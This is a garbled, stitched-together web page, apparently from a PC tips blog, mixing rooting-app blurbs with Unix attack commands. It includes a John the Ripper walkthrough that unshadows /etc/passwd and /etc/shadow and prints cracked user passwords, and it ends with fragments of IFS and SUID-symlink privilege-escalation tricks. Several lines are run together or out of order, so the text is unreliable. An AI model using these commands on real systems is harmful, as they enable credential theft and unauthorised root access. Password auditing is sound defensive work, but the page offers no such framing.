
This is the auto-rooting script that is written for Linux, SunOS, Mac OS X, and FreeBSD.
Welcome to my site. Please CLICK HERE to give your opinions regarding this new look of "PCTipsbyAnu". Thanks for visiting.
FOR 'BUSYBOX', 'SUPER ONE CLICK' AND 'SUPER USER' : GOTO THIS POSTSamsung Galaxy S with stock JPO Android 2.2 Froyo firmware has a 99 % success rate with this app. According to RyanZ, the creator of Z4root, this is the safest one click rooting app around that allegedly doesn’t messes anything up on your Android phone.
rundll32.exe keymgr.dll,KRShowKeyMgr
$ sudo apt-get install john
Note: RHEL, CentOS, Fedora, Redhat Linux user can grab john the ripper here. Once downloaded use rpm command:
# rpm -ivh john*
RHEL / CentOS / Fedora Linux user type the following command:$ sudo /usr/sbin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db
To check weak password (crack password), enter the following command:# /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db
$ john /tmp/crack.password.db
Output:john /tmp/crack.password.db
Loaded 1 password (FreeBSD MD5 [32/32])
This procedure will take its own time. To see the cracked passwords, enter:
Above output clearly indicates - user test has 123456 and didi has abc123 password.$ john -show /tmp/crack.password.db
test:123456:1002:1002:test,,,:/home/test:/bin/bash
didi:abc123:1003:1003::/home/didi:/usr/bin/rssh
2 passwords cracked, 1 left
system("/bin/date")
bin date
IFS='/';export IFS # Bourne Shell setenv IFS '/' # C Shell export IFS='/' # Korn Shell
% ln suid.sh -i%-i#
nice -19 suidprog ; ln -s evilprogsuidroot
suidprog ; id